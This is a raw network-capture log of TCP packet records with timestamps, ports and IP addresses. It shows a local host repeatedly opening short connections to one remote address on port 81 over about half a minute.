Jan 9, 2025 23:08:25.605814934 CET	49993	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:25.610892057 CET	81	49993	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:26.543025017 CET	81	49993	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:26.543042898 CET	81	49993	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:26.543298960 CET	49993	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:26.543711901 CET	49993	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:26.548487902 CET	81	49993	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:26.673681021 CET	49999	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:26.680123091 CET	81	49999	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:26.680207014 CET	49999	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:26.680701971 CET	49999	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:26.685509920 CET	81	49999	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:27.603636980 CET	81	49999	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:27.603684902 CET	49999	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:27.603975058 CET	81	49999	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:27.604016066 CET	49999	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:27.721266985 CET	49999	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:27.721683025 CET	50006	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:27.726162910 CET	81	49999	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:27.726531982 CET	81	50006	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:27.726592064 CET	50006	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:27.726758003 CET	50006	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:27.731513023 CET	81	50006	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:28.669912100 CET	81	50006	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:28.669990063 CET	81	50006	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:28.670084000 CET	50006	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:28.670242071 CET	50006	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:28.675142050 CET	81	50006	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:28.815385103 CET	50013	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:28.820682049 CET	81	50013	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:28.820744991 CET	50013	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:28.820888042 CET	50013	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:28.825642109 CET	81	50013	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:29.764852047 CET	81	50013	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:29.764878988 CET	81	50013	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:29.765033960 CET	50013	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:29.765444994 CET	50013	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:29.770392895 CET	81	50013	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:29.939430952 CET	50020	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:29.944271088 CET	81	50020	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:29.951345921 CET	50020	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:29.995357990 CET	50020	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:30.000245094 CET	81	50020	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:30.945502996 CET	81	50020	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:30.945554972 CET	50020	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:30.945738077 CET	81	50020	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:30.945775032 CET	50020	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:31.067248106 CET	50020	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:31.067641973 CET	50026	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:31.072030067 CET	81	50020	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:31.072416067 CET	81	50026	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:31.072474003 CET	50026	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:31.072673082 CET	50026	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:31.077450991 CET	81	50026	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:32.010430098 CET	81	50026	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:32.010457993 CET	81	50026	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:32.010588884 CET	50026	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:32.010588884 CET	50026	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:32.010967016 CET	50026	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:32.015769958 CET	81	50026	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:32.159790993 CET	50035	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:32.164709091 CET	81	50035	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:32.168989897 CET	50035	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:32.168989897 CET	50035	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:32.173806906 CET	81	50035	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:33.098706007 CET	81	50035	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:33.098788023 CET	50035	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:33.098865986 CET	81	50035	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:33.098920107 CET	50035	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:33.220541000 CET	50035	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:33.221039057 CET	50041	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:33.225680113 CET	81	50035	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:33.226749897 CET	81	50041	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:33.226859093 CET	50041	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:33.226989031 CET	50041	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:33.231758118 CET	81	50041	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:34.161581993 CET	81	50041	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:34.161829948 CET	81	50041	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:34.161957979 CET	50041	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:34.162893057 CET	50041	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:34.167722940 CET	81	50041	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:34.314054966 CET	50050	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:34.319067001 CET	81	50050	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:34.320878029 CET	50050	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:34.322536945 CET	50050	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:34.327303886 CET	81	50050	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:35.276041985 CET	81	50050	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:35.276087999 CET	81	50050	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:35.276091099 CET	50050	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:35.276128054 CET	50050	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:35.276315928 CET	50050	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:35.281306982 CET	81	50050	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:35.393466949 CET	50058	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:35.398407936 CET	81	50058	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:35.398478985 CET	50058	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:35.398664951 CET	50058	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:35.403394938 CET	81	50058	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:36.393789053 CET	81	50058	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:36.393847942 CET	81	50058	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:36.395230055 CET	50058	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:36.395663023 CET	50058	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:36.400418997 CET	81	50058	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:36.569036007 CET	50066	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:36.573887110 CET	81	50066	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:36.574457884 CET	50066	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:36.574618101 CET	50066	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:36.579380989 CET	81	50066	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:37.566555023 CET	81	50066	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:37.566627026 CET	50066	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:37.566715956 CET	81	50066	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:37.566761017 CET	50066	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:37.689033031 CET	50066	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:37.689472914 CET	50075	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:37.693911076 CET	81	50066	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:37.694356918 CET	81	50075	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:37.694468975 CET	50075	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:37.694600105 CET	50075	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:37.699351072 CET	81	50075	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:38.651248932 CET	81	50075	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:38.651422977 CET	50075	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:38.651439905 CET	81	50075	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:38.651529074 CET	50075	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:38.652046919 CET	50075	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:38.656863928 CET	81	50075	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:38.802508116 CET	50082	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:38.807486057 CET	81	50082	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:38.807563066 CET	50082	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:38.807920933 CET	50082	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:38.812680960 CET	81	50082	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:39.745829105 CET	81	50082	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:39.745896101 CET	50082	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:39.746021032 CET	81	50082	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:39.746072054 CET	50082	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:39.876389027 CET	50082	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:39.876823902 CET	50085	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:39.881684065 CET	81	50082	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:39.881696939 CET	81	50085	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:39.881970882 CET	50085	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:39.881970882 CET	50085	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:39.886760950 CET	81	50085	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:40.858985901 CET	81	50085	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:40.859039068 CET	81	50085	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:40.859067917 CET	50085	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:40.859164000 CET	50085	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:40.859384060 CET	50085	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:40.864142895 CET	81	50085	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:40.986774921 CET	50086	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:40.992172003 CET	81	50086	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:40.992238045 CET	50086	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:40.992362022 CET	50086	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:40.997361898 CET	81	50086	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:41.934221029 CET	81	50086	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:41.934237003 CET	81	50086	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:41.934344053 CET	50086	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:41.934344053 CET	50086	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:41.934560061 CET	50086	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:41.939337015 CET	81	50086	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:42.079624891 CET	50087	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:42.084676981 CET	81	50087	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:42.087424994 CET	50087	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:42.087651968 CET	50087	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:42.092506886 CET	81	50087	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:43.047229052 CET	81	50087	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:43.047311068 CET	50087	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:43.047332048 CET	81	50087	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:43.047410011 CET	50087	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:43.047494888 CET	50087	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:43.052330971 CET	81	50087	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:43.157932043 CET	50088	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:43.163121939 CET	81	50088	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:43.163208008 CET	50088	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:43.163356066 CET	50088	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:43.168317080 CET	81	50088	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:44.102062941 CET	81	50088	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:44.102185011 CET	81	50088	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:44.105736971 CET	50088	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:44.105900049 CET	50088	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:44.110629082 CET	81	50088	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:44.285243034 CET	50089	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:44.290133953 CET	81	50089	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:44.290247917 CET	50089	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:44.290612936 CET	50089	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:44.295396090 CET	81	50089	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:45.247185946 CET	81	50089	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:45.247245073 CET	50089	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:45.247247934 CET	81	50089	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:45.247302055 CET	50089	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:45.247421026 CET	50089	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:45.252146006 CET	81	50089	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:45.361267090 CET	50090	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:45.366321087 CET	81	50090	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:45.366410017 CET	50090	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:45.366745949 CET	50090	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:45.371700048 CET	81	50090	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:46.373790026 CET	81	50090	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:46.373979092 CET	81	50090	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:46.374707937 CET	50090	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:46.374707937 CET	50090	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:46.379570007 CET	81	50090	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:46.487128973 CET	50091	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:46.492099047 CET	81	50091	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:46.495512009 CET	50091	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:46.495512009 CET	50091	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:46.500519991 CET	81	50091	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:47.489059925 CET	81	50091	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:47.489114046 CET	50091	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:47.489120960 CET	81	50091	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:47.489161015 CET	50091	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:47.489329100 CET	50091	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:47.494051933 CET	81	50091	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:47.596232891 CET	50092	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:47.601233006 CET	81	50092	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:47.601300955 CET	50092	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:47.601435900 CET	50092	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:47.606246948 CET	81	50092	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:48.602277994 CET	81	50092	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:48.603470087 CET	81	50092	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:48.603601933 CET	50092	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:48.604159117 CET	50092	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:48.609095097 CET	81	50092	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:48.720386028 CET	50093	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:48.725373030 CET	81	50093	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:48.729087114 CET	50093	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:48.729087114 CET	50093	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:48.735490084 CET	81	50093	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:49.749823093 CET	81	50093	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:49.749847889 CET	81	50093	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:49.750000000 CET	50093	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:49.750000954 CET	50093	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:49.750056028 CET	50093	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:49.755261898 CET	81	50093	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:49.868906021 CET	50094	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:49.873848915 CET	81	50094	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:49.876962900 CET	50094	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:49.877713919 CET	50094	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:49.883023024 CET	81	50094	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:50.826832056 CET	81	50094	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:50.826905012 CET	50094	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:50.826998949 CET	81	50094	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:50.827047110 CET	50094	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:50.939537048 CET	50094	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:50.939949036 CET	50095	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:50.944519997 CET	81	50094	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:50.944875002 CET	81	50095	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:50.945063114 CET	50095	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:50.945063114 CET	50095	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:50.950016975 CET	81	50095	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:51.893944979 CET	81	50095	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:51.893966913 CET	81	50095	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:51.897078991 CET	50095	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:51.897078991 CET	50095	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:51.902018070 CET	81	50095	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:52.032994986 CET	50096	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:52.039365053 CET	81	50096	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:52.039577961 CET	50096	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:52.039577961 CET	50096	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:52.044553041 CET	81	50096	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:52.992819071 CET	81	50096	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:52.992867947 CET	81	50096	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:52.992887020 CET	50096	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:52.992914915 CET	50096	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:52.998070955 CET	50096	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:53.003340960 CET	81	50096	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:53.113418102 CET	50097	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:53.118398905 CET	81	50097	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:53.118516922 CET	50097	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:53.118810892 CET	50097	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:53.123725891 CET	81	50097	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:54.053534031 CET	81	50097	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:54.053596020 CET	81	50097	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:54.053626060 CET	50097	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:54.055613041 CET	50097	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:54.157957077 CET	50097	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:54.158055067 CET	50098	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:54.162785053 CET	81	50097	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:54.162853003 CET	81	50098	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:54.163001060 CET	50098	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:54.163233995 CET	50098	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:54.167977095 CET	81	50098	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:55.109482050 CET	81	50098	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:55.109529018 CET	50098	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:55.109576941 CET	81	50098	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:55.109612942 CET	50098	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:55.110022068 CET	50098	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:55.114824057 CET	81	50098	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:55.222894907 CET	50099	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:55.227873087 CET	81	50099	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:55.227936983 CET	50099	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:55.229773045 CET	50099	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:55.234601021 CET	81	50099	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:56.176774025 CET	81	50099	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:56.176834106 CET	81	50099	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:56.176883936 CET	50099	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:56.177028894 CET	50099	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:56.282470942 CET	50099	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:56.282716036 CET	50100	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:56.287374973 CET	81	50099	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:56.287565947 CET	81	50100	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:56.287708998 CET	50100	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:56.288063049 CET	50100	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:56.292841911 CET	81	50100	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:57.253669977 CET	81	50100	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:57.253737926 CET	81	50100	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:57.253758907 CET	50100	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:57.253849030 CET	50100	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:57.253896952 CET	50100	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:57.258760929 CET	81	50100	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:57.361193895 CET	50101	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:57.366085052 CET	81	50101	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:57.366197109 CET	50101	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:57.366319895 CET	50101	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:57.371066093 CET	81	50101	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:58.318607092 CET	81	50101	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:58.318634033 CET	81	50101	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:58.318811893 CET	50101	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:58.318811893 CET	50101	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:58.323760033 CET	81	50101	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:58.424484015 CET	50102	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:58.429486990 CET	81	50102	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:58.431705952 CET	50102	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:58.435591936 CET	50102	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:58.440387964 CET	81	50102	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:59.388365984 CET	81	50102	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:59.388427019 CET	81	50102	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:59.388457060 CET	50102	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:59.388550043 CET	50102	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:59.388622046 CET	50102	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:59.393578053 CET	81	50102	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:59.509809971 CET	50103	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:59.514822006 CET	81	50103	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:59.514895916 CET	50103	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:59.514986992 CET	50103	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:59.519831896 CET	81	50103	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:00.458390951 CET	81	50103	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:00.458447933 CET	81	50103	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:00.458662987 CET	50103	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:00.458662987 CET	50103	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:00.463541985 CET	81	50103	47.121.190.121	192.168.2.4
Jan 9, 2025 23:09:00.564938068 CET	50104	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:09:00.569994926 CET	81	50104	47.121.190.121	192.168.2.4
